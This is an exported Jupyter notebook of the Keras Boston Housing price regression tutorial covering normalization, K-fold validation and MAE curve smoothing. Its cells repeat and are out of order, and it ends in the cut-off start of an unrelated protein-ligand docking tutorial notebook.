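The same feature-wise normalization can be written with scikit-learn, which makes the "fit on the training data, reuse on the test data" rule explicit. This is a minimal sketch for reference only, assuming scikit-learn is installed; it reloads the raw arrays so it does not re-scale the data already normalized in place above.

```python
from sklearn.preprocessing import StandardScaler
from keras.datasets import boston_housing

# Reload the raw (unnormalized) arrays for this illustration.
(raw_train, _), (raw_test, _) = boston_housing.load_data()

scaler = StandardScaler()
raw_train_scaled = scaler.fit_transform(raw_train)  # statistics computed on training data only
raw_test_scaled = scaler.transform(raw_test)        # same statistics applied to the test data
```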
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be a linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range. Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems. We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, an MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model. The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
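The manual partition slicing above can also be expressed with scikit-learn's `KFold` iterator. This is an equivalent sketch, assuming scikit-learn is available; the exact scores will differ slightly because fold boundaries and weight initialization are not identical.

```python
from sklearn.model_selection import KFold

kf = KFold(n_splits=k)
fold_scores = []
for train_idx, val_idx in kf.split(train_data):
    fold_model = build_model()
    fold_model.fit(train_data[train_idx], train_targets[train_idx],
                   epochs=num_epochs, batch_size=1, verbose=0)
    _, fold_mae = fold_model.evaluate(train_data[val_idx],
                                      train_targets[val_idx], verbose=0)
    fold_scores.append(fold_mae)
np.mean(fold_scores)
```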
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications. Do not confuse "regression" with "logistic regression": despite its name, logistic regression is not a regression algorithm but a classification algorithm (an intuitive picture: it separates two classes of samples with a curve in the x-y plane). The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance, some values are proportions, which take values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follows:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit and no activation (i.e. it is a linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range the output can take; for instance, if we applied a `sigmoid` activation to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to predict values in any range. Note that we compile the network with the `mse` loss function (Mean Squared Error, the square of the difference between the predictions and the targets), a loss function widely used for regression problems. We also monitor a new metric during training: `mae`, which stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, an MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of training epochs), we could simply split the data into a training set and a validation set, as we did in the previous examples. However, because we have so few data points, the validation set would end up being very small (roughly 100 examples). As a result, our validation scores could change a lot depending on which data points we choose for validation and which for training, i.e. the validation scores could have a high variance with respect to the validation split. This would prevent us from reliably evaluating our model. The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model is then the average of the K validation scores obtained. In terms of code, this is straightforward:
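To make the two quantities concrete, here is a tiny hand computation of MSE and MAE on made-up numbers (purely illustrative values, not model output):

```python
import numpy as np

y_true = np.array([15.2, 22.0, 31.5])   # targets, in thousands of dollars
y_pred = np.array([14.7, 23.1, 30.9])   # hypothetical predictions

mse = np.mean((y_true - y_pred) ** 2)   # the loss being minimized
mae = np.mean(np.abs(y_true - y_pred))  # the metric being monitored
print(mse, mae)  # an MAE of 0.5 would correspond to being off by $500 on average
```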
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
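With the final model trained, producing actual price estimates is a single call. A minimal sketch, assuming the `model` fitted in the previous cell is still in memory:

```python
# Predicted median prices for the test suburbs, in thousands of dollars.
predictions = model.predict(test_data)
print(predictions[:5].flatten() * 1000)  # first few predictions, in dollars
```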
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
average_mae_history
###Output
_____no_output_____
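Since every fold was trained for the same number of epochs, the list comprehension above is equivalent to a single vectorized call; a quick cross-check:

```python
# Same per-epoch average across folds, computed in one step (shape: num_epochs).
average_mae_history_np = np.mean(all_mae_histories, axis=0)
```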
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.figure(figsize=(12,5))
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.figure(figsize=(12,5))
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____ |
offline_analysis/Analysis_2737_LFP_position_stim_Jhan.ipynb | ###Markdown
Requires the emk_neuro_analysis environment. Loads LFP, camera tracking positions and DIO.
###Code
import pandas as pd
import numpy as np
from pprint import pprint
from matplotlib import pyplot as plt
from emk_analysis import builder_experiment as bld_exp
from emk_neuro_analysis.lfp import iterator as lfp_iter
from emk_neuro_analysis.position import iterator as pos_iter
###Output
_____no_output_____
###Markdown
Experiment parameters
###Code
# name of experiment
experiment_name = '6082737'
experiment_phase = 'stim'
# data drive
data_disk = 'nvme0'
# directory with the preprocessed/extracted data files
dir_preprocess = f'/media/{data_disk}/Data/{experiment_name}/preprocessing/'
# Location of track config file.
# This is an excel spreadsheet that specifies the identities of the DIO for your experiment.
fname_config_track = (f'/media/{data_disk}/Data/{experiment_name}/config/Maze_S_Config.xlsx')
# Location of day records.
# This is an excel spreadsheet that lists details for each session on your experiment day.
dir_records = (f'/media/{data_disk}/Data/{experiment_name}/dayrecords/')
# choose the date - as a list
choose_dates = [ '20220425',]
# choose the epoch - as a list
epoch_list = [1,]
# choose the tetrodes - as a list
tet_list = [28, 27, 20, 19, 18, ]
###Output
_____no_output_____
###Markdown
Build day records from track config file and experiment file
###Code
data_days = []
for curr_date in choose_dates:
fname_day_record = f'{dir_records}{curr_date}_{experiment_phase}_training_record.xlsx'
dict_sessions_day = bld_exp.build_day_from_file(experiment_name,
track_config_file=fname_config_track,
day_record_file=fname_day_record)
data_days.append(dict_sessions_day)
dict_sessions_all = bld_exp.build_all_sessions(data_days)
pprint(dict_sessions_all)
###Output
{'20220425_01': {'date': '20220425',
'description': 'maze stim',
'end': Timestamp('2022-04-25 23:55:00'),
'experiment': '6082737',
'id': 1,
'name': 'stim',
'start': Timestamp('2022-04-25 01:00:00'),
'tasks': {'Track 1': {'animal_id': 'clc',
'description': 'S',
'dio': {'10': {'bit': '_',
'notes': None,
'type': 'Unnamed:'},
'11': {'bit': '_',
'notes': None,
'type': 'Unnamed:'},
'6': {'bit': '_',
'notes': None,
'type': 'Unnamed:'},
'7': {'bit': '_',
'notes': None,
'type': 'Unnamed:'},
'8': {'bit': '_',
'notes': None,
'type': 'Unnamed:'},
'9': {'bit': '_',
'notes': None,
'type': 'Unnamed:'},
'decision_pump': {'bit': 1,
'notes': None,
'type': 'out'},
'signal_pump': {'bit': 2,
'notes': None,
'type': 'out'},
'trigger_sensor': {'bit': 7,
'notes': None,
'type': 'in'}},
'notes': 'Closed loop'}}}}
###Markdown
Load LFP data
###Code
lfp_data, lfp_timestamp = lfp_iter.iterate_lfp_load(dir_preprocess,
tet_list,
choose_dates,
epoch_list=epoch_list,
remove_movement_artifact=True,
filter_linenoise=False,
print_debug=False)
###Output
/home/jaiyu/.conda/envs/emk_neuro_analysis/lib/python3.6/site-packages/rec_to_binaries/read_binaries.py:73: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
return np.dtype(typearr)
###Markdown
Load position data
###Code
# this specifies the zoom factor on the camera
# needs to be measured
# current setting of L17
cm_pix = {1: 0.3109,
2: 0.05310,
3: 0.3109,
4: 0.05310,
5: 0.3109,
6: 0.05310,
7: 0.3109,
}
df_pos = pos_iter.iterate_pos_load(dir_preprocess,
date_list=choose_dates,
epoch_list=epoch_list,
cm_pix=cm_pix,
print_debug=False)
###Output
1
Loaded /media/nvme0/Data/6082737/preprocessing/20220425/20220425_6082737_01_stim.1.pos
###Markdown
Plot LFP and speed
###Code
%matplotlib notebook
# sampling rate, convert raw timestamps to seconds on x-axis
fs = 30000
plt.figure()
# speed
plt.plot(df_pos.time/fs, df_pos.dxdydt_cm, zorder=-1, alpha=.4)
# position
plt.plot(df_pos.time/fs, df_pos.xloc_smooth/10, zorder=-1, alpha=.4)
for i, (k, v) in enumerate(lfp_data.items()):
for e in epoch_list:
plt.plot(np.array(lfp_timestamp.get(e))/fs, np.array(v.get(e))/1000+5*(i-10), lw=.15)
plt.xlabel('Time (s)')
plt.ylabel('Speed (cm/s)')
plt.tight_layout()
max(df_pos.xloc_smooth)-min(df_pos.xloc_smooth)
max(df_pos.yloc_smooth)-min(df_pos.yloc_smooth)
###Output
_____no_output_____ |
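The smoothed position columns also support simple summary statistics. The sketch below is an illustration only (not part of the original analysis); it estimates the total path length travelled during the epoch, assuming `xloc_smooth` and `yloc_smooth` are already in cm as configured by `cm_pix` above.

```python
import numpy as np

# Per-sample displacements from the smoothed x/y traces, summed over the epoch.
dx = np.diff(df_pos.xloc_smooth.to_numpy())
dy = np.diff(df_pos.yloc_smooth.to_numpy())
total_path_cm = np.nansum(np.hypot(dx, dy))
print(f'Total path length: {total_path_cm:.1f} cm')
```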
notebooks/ImageMaps_Part2.ipynb | ###Markdown
Part 2 of Image Maps: Image Maps - Clickable Cytogenetic BandsThis page is primarily based on the following page at the Circos documentation site:- [2. Image Maps - Clickable Cytogenetic Bands](????????????)That page is found as part number 2 of the ??? part ['Image Maps' section](http://circos.ca/documentation/tutorials/quick_start/) of [the larger set of Circos tutorials](http://circos.ca/documentation/tutorials/). Go back to Part 1 by clicking [here &#8592;](ImageMaps_Part1.ipynb).----10 --- Image Maps: 2. Image Maps - Clickable Cytogenetic Bands. Chromosomes can have cytogenetic bands associated with them in the karyotype file. These bands serve to define distinct regions on the chromosome. Typically, the bands are used to orient large-scale structures (>5Mb) on the chromosome and act as visual markers. You can use these bands for any purpose, however. To associate a URL with each band, use the `band_url` parameter in the <ideogram> block. ```iniband_url = script?start=[start]&end=[end]&label=[label]...``` Parameters for bands: bands have the following parameters available automatically in their URL- chr - chromosome of band- parent - internal field- name - name of the band- start - base position of band start- end - base position of band end- size - size of band- color - color of band- label - the label of the band (this can be different from the name)Like for ideograms, you can include an `id` parameter in the band definition and use it subsequently in the URL. So, in the karyotype file you might have ```ini...band hs1 p31.2 p31.2 68700000 69500000 gnegband hs1 p31.1 p31.1 69500000 84700000 gpos100 id=treasure_hereband hs1 p22.3 p22.3 84700000 88100000 gneg...``` and then use a URL like ```iniband_url = script?id=[id]``` If you have `image_map_missing_parameter=removeparam`, then all bands without a defined id parameter will have a URL like ```iniscript?id=``` with the exception of chr1p31.1 which will have ```iniscript?id=treasure_here``` But, if you define `image_map_missing_parameter=removeurl`, then only bands with the id parameter defined will have a URL - other bands will not have an entry in the image map. Managing overlapping links - ideograms and bands: bands are drawn on top of ideograms and therefore band image map elements locally override ideogram map elements. This is accomplished by placing the band image map element before the ideogram element in the map file. Both elements are there, but the [W3 specification for client-side image maps](http://www.w3.org/TR/REC-html40/struct/objects.htmlh-13.6.1) specifies that "If two or more defined regions overlap, the region-defining element that appears earliest in the document takes precedence (i.e., responds to user input)". The second image in this tutorial demonstrates the result of defining both an ideogram and a band URL ```iniideogram_url = script?chr=[chr]band_url = script?start=[start]&end=[end]&label=[label]``` You'll notice that in the region of the ideogram, band links are active in the image map.
However, since the ideogram image map also includes the label of the ideogram, you can still access the link of the ideogram through the label. In the case of bands without a URL, the ideogram link would be accessible within the area of the band.---- Generating the plot produced by this example codeThe following two cells will generate the plot. The first cell adjusts the current working directory.
###Code
%cd ../circos-tutorials-0.67/tutorials/10/2/
%%bash
../../../../circos-0.69-6/bin/circos -conf circos.conf
###Output
debuggroup summary 0.38s welcome to circos v0.69-6 31 July 2017 on Perl 5.022000
debuggroup summary 0.39s current working directory /home/jovyan/circos-tutorials-0.67/tutorials/10/2
debuggroup summary 0.39s command ../../../../circos-0.69-6/bin/circos -conf circos.conf
debuggroup summary 0.39s loading configuration from file circos.conf
debuggroup summary 0.39s found conf file circos.conf
debuggroup summary 0.55s debug will appear for these features: output,summary
debuggroup summary 0.56s bitmap output image ./circos.png
debuggroup summary 0.56s SVG output image ./circos.svg
debuggroup summary 0.56s HTML map file ./circos.html
debuggroup summary 0.56s parsing karyotype and organizing ideograms
debuggroup summary 0.67s karyotype has 24 chromosomes of total size 3,080,419,504
debuggroup summary 0.68s applying global and local scaling
debuggroup summary 0.69s allocating image, colors and brushes
debuggroup summary 2.94s drawing 24 ideograms of total size 3,080,419,504
debuggroup summary 2.94s drawing highlights and ideograms
debuggroup output 5.63s generating output
debuggroup output 5.63s compiling image map
debuggroup output 5.71s created HTML image map at ./circos.html (202 kb)
debuggroup output 6.63s created PNG image ./circos.png (452 kb)
debuggroup output 6.63s created SVG image ./circos.svg (347 kb)
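The log above reports an HTML image map written to `./circos.html`. As a quick sanity check (not part of the original tutorial), the clickable regions can be inspected with a few lines of standard-library Python; the regular expression is a rough sketch that assumes each clickable region is stored as an `<area>` element with an `href` attribute.

```python
import re

with open('circos.html') as f:
    html = f.read()

# Collect the href of every clickable <area> element in the image map.
hrefs = re.findall(r'<area[^>]*href="([^"]*)"', html)
print(len(hrefs), 'clickable regions')
print(hrefs[:5])
```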
###Markdown
View the plot in this page using the following cell.
###Code
from IPython.display import Image
Image("circos.png")
###Output
_____no_output_____ |
biobb_wf_virtual-screening/html/fpocket/wf_vs_fpocket.web.ipynb | ###Markdown
Protein-ligand Docking tutorial using BioExcel Building Blocks (biobb) -- *Fpocket Version* --***This tutorial aims to illustrate the process of **protein-ligand docking**, step by step, using the **BioExcel Building Blocks library (biobb)**. The particular example used is the **Mitogen-activated protein kinase 14** (p38-α) protein (PDB code [3HEC](https://www.rcsb.org/structure/3HEC)), a well-known **Protein Kinase enzyme**, in complex with the FDA-approved **Imatinib** (PDB Ligand code [STI](https://www.rcsb.org/ligand/STI), DrugBank Ligand Code [DB00619](https://go.drugbank.com/drugs/DB00619)), a small molecule **kinase inhibitor** used to treat certain types of **cancer**. The tutorial will guide you through the process of identifying the **active site cavity** (pocket) without previous knowledge, and the final prediction of the **protein-ligand complex**. Please note that **docking algorithms**, and in particular the **AutoDock Vina** program used in this tutorial, are **non-deterministic**. That means that results obtained when running the workflow **could be different** from the ones we obtained during the writing of this tutorial (see [AutoDock Vina manual](http://vina.scripps.edu/manual.html)). We invite you to try the docking process several times to verify this behaviour. ***Important: it is recommended to execute this tutorial step by step (not as a single workflow execution, Run All mode), as it has interactive selections. Settings Biobb modules used - [biobb_io](https://github.com/bioexcel/biobb_io): Tools to fetch biomolecular data from public databases. - [biobb_structure_utils](https://github.com/bioexcel/biobb_structure_utils): Tools to modify or extract information from a PDB structure file. - [biobb_chemistry](https://github.com/bioexcel/biobb_chemistry): Tools to perform chemoinformatics processes. - [biobb_vs](https://github.com/bioexcel/biobb_vs): Tools to perform virtual screening studies. Auxiliary libraries used - [nb_conda_kernels](https://github.com/Anaconda-Platform/nb_conda_kernels): Enables a Jupyter Notebook or JupyterLab application in one conda environment to access kernels for Python, R, and other languages found in other environments. - [nglview](http://nglviewer.org/nglview): Jupyter/IPython widget to interactively view molecular structures and trajectories in notebooks. - [ipywidgets](https://github.com/jupyter-widgets/ipywidgets): Interactive HTML widgets for Jupyter notebooks and the IPython kernel. Conda Installation and Launch```consolegit clone https://github.com/bioexcel/biobb_wf_virtual-screening.gitcd biobb_wf_virtual-screeningconda env create -f conda_env/environment.ymlconda activate biobb_VS_tutorialjupyter-nbextension enable --py --user widgetsnbextensionjupyter-nbextension enable --py --user nglviewjupyter-notebook biobb_wf_virtual-screening/notebooks/fpocket/wf_vs_fpocket.ipynb ``` *** Pipeline steps 1. [Input Parameters](input) 2. [Fetching PDB Structure](fetch) 3. [Extract Protein Structure](extractProtein) 4. [Computing Protein Cavities (fpocket)](fpocket) 5. [Filtering Protein Cavities (fpocket output)](fpocketFilter) 6. [Extract Pocket Cavity ](fpocketSelect) 7. [Generating Cavity Box ](cavityBox) 8. [Downloading Small Molecule](downloadSmallMolecule) 9. [Converting Small Molecule](sdf2pdb) 10. [Preparing Small Molecule (ligand) for Docking](ligand_pdb2pdbqt) 11. [Preparing Target Protein for Docking](protein_pdb2pdbqt) 12. [Running the Docking](docking) 13. [Extract a Docking Pose](extractPose) 14. 
